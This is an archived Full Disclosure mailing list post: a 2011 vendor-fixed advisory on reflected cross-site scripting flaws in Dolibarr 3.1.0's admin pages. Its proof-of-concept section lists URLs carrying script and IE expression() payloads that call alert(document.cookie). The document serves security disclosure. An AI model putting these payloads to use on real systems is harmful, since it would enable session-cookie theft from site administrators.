Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0

From: "Schurtz, Stefan" <S.Schurtz () infoserve de>
Date: Wed, 9 Nov 2011 11:49:30 +0000
Advisory:               Multiple Cross-Site-Scripting vulnerabilities in
Dolibarr 3.1.0
Advisory ID:            INFOSERVE-ADV2011-03
Author:                 Stefan Schurtz
Contact:                        security () infoserve de
Affected Software:      Successfully tested on Dolibarr 3.1.0 other versions
may also be affected
Vendor URL:             http://www.dolibarr.org/
Vendor Status:          fixed in the 3.1 branch

==========================
Vulnerability Description
==========================

Dolibarr 3.1.0 is prone to multiple XSS vulnerability

==================
PoC-Exploit
==================

Cross-Site-Scripting - parameter 'username'

http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</
script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</
script><script>alert(document.cookie)</script>&=3&optioncss=print

IE-only

http://<target>/admin/security_other.php/"
stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/"
stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/user.php/"
stYle="x:expre/**/ssion(alert(document.cookie))

=========
Solution:
=========

Fixed in the 3.1 branch

====================
Disclosure Timeline:
====================

08-Nov-2011 - vendor informed
09-Nov-2011 - vendor fix in the 3.1 branch
09-Nov-2011 - release date of this security advisory

========
Credits:
========

Vulnerabilities found and advisory written by the INFOSERVE Security Team

===========
References:
===========

https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4
207e78a1
http://www.dolibarr.org/

Best regards,
Stefan Schurtz | SECURE INFRASTRUCTURE

INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken
Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 | s.schurtz () infoserve de |
www.infoserve.de

Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort:
Saarbrücken
Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599

Attachment: smime.p7s
Description: 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: